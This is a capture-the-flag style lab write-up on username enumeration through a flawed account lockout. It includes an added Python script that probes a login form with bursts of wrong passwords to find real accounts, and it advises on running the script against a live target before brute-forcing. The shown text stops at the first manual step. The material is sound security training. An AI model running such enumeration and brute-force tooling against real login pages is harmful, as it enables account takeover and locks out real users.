🔐 Info Lab: Username Enumeration via Account Locking

🧪 Lab Description:

This lab is vulnerable to username enumeration. It uses account locking, but there's a logic flaw in its implementation.

To solve the lab:

  1. 🕵️‍♂️ Enumerate a valid username
  2. 🔓 Brute-force the user's password
  3. ✅ Access their account page

📂 Useful Resources:


🧪 Step-by-Step Guide to Solving the Lab: Username Enumeration via Account Locking

The main goal is to enumerate a valid username first, then brute-force the password.

However, the application locks accounts after several incorrect login attempts, and that is where the logic flaw lies: the lockout (and its "too many incorrect login attempts" message) is only applied to usernames that actually exist, while a non-existent username keeps returning the generic error no matter how many times you fail. A burst of wrong passwords therefore acts as an oracle for whether the username is valid.
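The following script is an added example for this write-up (it is not PortSwigger's code and not part of the original page). It drives the lockout oracle described above: for each candidate username it sends a burst of wrong passwords and compares the set of responses with the set obtained for a username that cannot exist. A constructed `FlawedLoginServer` models the vulnerable logic so the script runs offline; `http_login()` is what you would pass in against the live lab. The lockout threshold, the exact message wording, the `/login` path and the `username`/`password` field names are assumptions.

```python
"""Added example: username enumeration through a flawed account lockout.

Assumptions (not taken from the lab itself): the account locks after three
failed attempts, the lock page contains LOCK_MESSAGE, unknown usernames
always get GENERIC_ERROR, and the login form posts 'username'/'password'
to /login.  FlawedLoginServer is a constructed stand-in for the target.
"""

LOCK_MESSAGE = "You have made too many incorrect login attempts"  # assumed wording
GENERIC_ERROR = "Invalid username or password"                     # assumed wording
LOCK_THRESHOLD = 3                                                 # assumed threshold


class FlawedLoginServer:
    """Constructed model of the vulnerable logic: failed attempts are only
    counted, and the lock message only shown, for usernames that exist."""

    def __init__(self, accounts):
        self.accounts = dict(accounts)   # username -> password
        self.failures = {}               # username -> consecutive failures

    def login(self, username, password):
        if username not in self.accounts:
            return GENERIC_ERROR         # the flaw: unknown users never lock
        if self.failures.get(username, 0) >= LOCK_THRESHOLD:
            return LOCK_MESSAGE
        if self.accounts[username] == password:
            self.failures[username] = 0
            return "Welcome back"
        self.failures[username] = self.failures.get(username, 0) + 1
        if self.failures[username] >= LOCK_THRESHOLD:
            return LOCK_MESSAGE
        return GENERIC_ERROR


def http_login(base_url, username, password):
    """Login call for the live lab. Path and field names are assumptions."""
    import requests  # third-party; only needed when hitting the real target
    resp = requests.post(f"{base_url}/login",
                         data={"username": username, "password": password},
                         allow_redirects=False, timeout=10)
    return resp.text


def probe(login, username, attempts):
    """Send `attempts` wrong passwords and return the set of distinct replies."""
    return {login(username, f"wrong-{i}") for i in range(attempts)}


def enumerate_usernames(login, candidates, attempts=LOCK_THRESHOLD + 1):
    """Return the candidates whose lockout behaviour differs from a baseline.

    The baseline is a username that cannot exist; any difference between it
    and a candidate (lock text appearing, different length) marks the
    candidate as a real account.
    """
    baseline = probe(login, "definitely-not-a-user-0xdeadbeef", attempts)
    return [u for u in candidates if probe(login, u, attempts) != baseline]


if __name__ == "__main__":
    server = FlawedLoginServer({"carlos": "montoya"})   # constructed account
    wordlist = ["alice", "carlos", "bob"]                # constructed candidates
    print(enumerate_usernames(server.login, wordlist))   # ['carlos']
    # Against the live lab you would pass the HTTP function instead:
    #   enumerate_usernames(lambda u, p: http_login(LAB_URL, u, p), wordlist)
```

When you point this at a real target, compare the error message or the response length rather than the whole HTML body, since per-request tokens would otherwise make every response look different. Note also that a successful probe leaves the real account locked, so you will have to wait for the lock to expire before logging in with the password you brute-force in the next step.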


🧭 Step 1: Start With Manual Login Attempt

  1. 🔍 Go to the login page
  2. ❌ Try logging in with an incorrect username and password (e.g., user: test, pass: test123) and note the error message you get back